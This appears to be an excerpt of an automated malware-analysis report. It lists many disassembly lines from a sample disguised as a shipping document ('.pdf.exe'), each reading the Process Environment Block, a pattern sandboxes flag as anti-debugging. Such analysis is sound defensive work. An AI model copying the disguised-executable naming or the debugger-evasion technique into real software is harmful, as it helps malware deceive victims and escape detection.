Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2CCD1 mov ecx, dword ptr fs:[00000030h]	6_2_1EA2CCD1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2CCD1 mov eax, dword ptr fs:[00000030h]	6_2_1EA2CCD1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2CCD1 mov eax, dword ptr fs:[00000030h]	6_2_1EA2CCD1
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA75CD0 mov eax, dword ptr fs:[00000030h]	6_2_1EA75CD0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]	6_2_1EA83CD4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]	6_2_1EA83CD4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA83CD4 mov ecx, dword ptr fs:[00000030h]	6_2_1EA83CD4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]	6_2_1EA83CD4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA83CD4 mov eax, dword ptr fs:[00000030h]	6_2_1EA83CD4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA18CDF mov eax, dword ptr fs:[00000030h]	6_2_1EA18CDF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA18CDF mov eax, dword ptr fs:[00000030h]	6_2_1EA18CDF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4CD2 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4CD2
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C20 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0AC20 mov eax, dword ptr fs:[00000030h]	6_2_1EA0AC20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0AC20 mov eax, dword ptr fs:[00000030h]	6_2_1EA0AC20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0AC20 mov eax, dword ptr fs:[00000030h]	6_2_1EA0AC20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA87C38 mov eax, dword ptr fs:[00000030h]	6_2_1EA87C38
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB5C38 mov eax, dword ptr fs:[00000030h]	6_2_1EAB5C38
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB5C38 mov ecx, dword ptr fs:[00000030h]	6_2_1EAB5C38
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA24C3D mov eax, dword ptr fs:[00000030h]	6_2_1EA24C3D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E8C3D mov eax, dword ptr fs:[00000030h]	6_2_1E9E8C3D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]	6_2_1EA22C10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]	6_2_1EA22C10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]	6_2_1EA22C10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22C10 mov eax, dword ptr fs:[00000030h]	6_2_1EA22C10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov ecx, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C60 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BC6E mov eax, dword ptr fs:[00000030h]	6_2_1EA2BC6E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BC6E mov eax, dword ptr fs:[00000030h]	6_2_1EA2BC6E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EDC40 mov eax, dword ptr fs:[00000030h]	6_2_1E9EDC40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03C40 mov eax, dword ptr fs:[00000030h]	6_2_1EA03C40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F0C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F0C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F0C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F0C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F0C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F0C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F8C79 mov eax, dword ptr fs:[00000030h]	6_2_1E9F8C79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA73C57 mov eax, dword ptr fs:[00000030h]	6_2_1EA73C57
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4C59 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4C59
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECC68 mov eax, dword ptr fs:[00000030h]	6_2_1E9ECC68
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4DA7 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4DA7
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F6D91 mov eax, dword ptr fs:[00000030h]	6_2_1E9F6D91
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECD8A mov eax, dword ptr fs:[00000030h]	6_2_1E9ECD8A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9ECD8A mov eax, dword ptr fs:[00000030h]	6_2_1E9ECD8A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22DBC mov eax, dword ptr fs:[00000030h]	6_2_1EA22DBC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA22DBC mov ecx, dword ptr fs:[00000030h]	6_2_1EA22DBC
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F7DB6 mov eax, dword ptr fs:[00000030h]	6_2_1E9F7DB6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EDDB0 mov eax, dword ptr fs:[00000030h]	6_2_1E9EDDB0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E6DA6 mov eax, dword ptr fs:[00000030h]	6_2_1E9E6DA6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABCDEB mov eax, dword ptr fs:[00000030h]	6_2_1EABCDEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EABCDEB mov eax, dword ptr fs:[00000030h]	6_2_1EABCDEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1FDE0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1FDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E8DCD mov eax, dword ptr fs:[00000030h]	6_2_1E9E8DCD
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA9FDF4 mov eax, dword ptr fs:[00000030h]	6_2_1EA9FDF4
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EEDFA mov eax, dword ptr fs:[00000030h]	6_2_1E9EEDFA
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAADD6 mov eax, dword ptr fs:[00000030h]	6_2_1EAAADD6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAAADD6 mov eax, dword ptr fs:[00000030h]	6_2_1EAAADD6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FBDE0 mov eax, dword ptr fs:[00000030h]	6_2_1E9FBDE0
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov ecx, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1AD20 mov eax, dword ptr fs:[00000030h]	6_2_1EA1AD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]	6_2_1EAA0D24
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]	6_2_1EAA0D24
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]	6_2_1EAA0D24
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA0D24 mov eax, dword ptr fs:[00000030h]	6_2_1EAA0D24
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]	6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]	6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]	6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]	6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]	6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9FAD00 mov eax, dword ptr fs:[00000030h]	6_2_1E9FAD00
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA10D01 mov eax, dword ptr fs:[00000030h]	6_2_1EA10D01
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAABD08 mov eax, dword ptr fs:[00000030h]	6_2_1EAABD08
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAABD08 mov eax, dword ptr fs:[00000030h]	6_2_1EAABD08
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA88D0A mov eax, dword ptr fs:[00000030h]	6_2_1EA88D0A
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1CD10 mov eax, dword ptr fs:[00000030h]	6_2_1EA1CD10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1CD10 mov ecx, dword ptr fs:[00000030h]	6_2_1EA1CD10
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EFD20 mov eax, dword ptr fs:[00000030h]	6_2_1E9EFD20
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA05D60 mov eax, dword ptr fs:[00000030h]	6_2_1EA05D60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA75D60 mov eax, dword ptr fs:[00000030h]	6_2_1EA75D60
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC5D65 mov eax, dword ptr fs:[00000030h]	6_2_1EAC5D65
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1D50 mov eax, dword ptr fs:[00000030h]	6_2_1E9F1D50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9F1D50 mov eax, dword ptr fs:[00000030h]	6_2_1E9F1D50
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA96D79 mov esi, dword ptr fs:[00000030h]	6_2_1EA96D79
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BD71 mov eax, dword ptr fs:[00000030h]	6_2_1EA2BD71
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA2BD71 mov eax, dword ptr fs:[00000030h]	6_2_1EA2BD71
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E9D46 mov eax, dword ptr fs:[00000030h]	6_2_1E9E9D46
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E9D46 mov eax, dword ptr fs:[00000030h]	6_2_1E9E9D46
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9E9D46 mov ecx, dword ptr fs:[00000030h]	6_2_1E9E9D46
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6CD40 mov eax, dword ptr fs:[00000030h]	6_2_1EA6CD40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA6CD40 mov eax, dword ptr fs:[00000030h]	6_2_1EA6CD40
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4D4B mov eax, dword ptr fs:[00000030h]	6_2_1EAC4D4B
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB5D43 mov eax, dword ptr fs:[00000030h]	6_2_1EAB5D43
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAB5D43 mov eax, dword ptr fs:[00000030h]	6_2_1EAB5D43
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DD4D mov eax, dword ptr fs:[00000030h]	6_2_1EA0DD4D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DD4D mov eax, dword ptr fs:[00000030h]	6_2_1EA0DD4D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA0DD4D mov eax, dword ptr fs:[00000030h]	6_2_1EA0DD4D
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA71D5E mov eax, dword ptr fs:[00000030h]	6_2_1EA71D5E
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAADAAF mov eax, dword ptr fs:[00000030h]	6_2_1EAADAAF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA97ABE mov eax, dword ptr fs:[00000030h]	6_2_1EA97ABE
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA29ABF mov eax, dword ptr fs:[00000030h]	6_2_1EA29ABF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA29ABF mov eax, dword ptr fs:[00000030h]	6_2_1EA29ABF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA29ABF mov eax, dword ptr fs:[00000030h]	6_2_1EA29ABF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1E9EBA80 mov eax, dword ptr fs:[00000030h]	6_2_1E9EBA80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAA6A80 mov eax, dword ptr fs:[00000030h]	6_2_1EAA6A80
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EAC4AE8 mov eax, dword ptr fs:[00000030h]	6_2_1EAC4AE8
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA10AEB mov eax, dword ptr fs:[00000030h]	6_2_1EA10AEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA10AEB mov eax, dword ptr fs:[00000030h]	6_2_1EA10AEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA10AEB mov eax, dword ptr fs:[00000030h]	6_2_1EA10AEB
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]	6_2_1EA03AF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]	6_2_1EA03AF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]	6_2_1EA03AF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]	6_2_1EA03AF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA03AF6 mov eax, dword ptr fs:[00000030h]	6_2_1EA03AF6
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA70AFF mov eax, dword ptr fs:[00000030h]	6_2_1EA70AFF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA70AFF mov eax, dword ptr fs:[00000030h]	6_2_1EA70AFF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA70AFF mov eax, dword ptr fs:[00000030h]	6_2_1EA70AFF
Source: C:\Users\user\Desktop\Arrival Notice, CIA Awb Inv Form.pdf.exe	Code function: 6_2_1EA1DAC0 mov eax, dword ptr fs:[00000030h]	6_2_1EA1DAC0
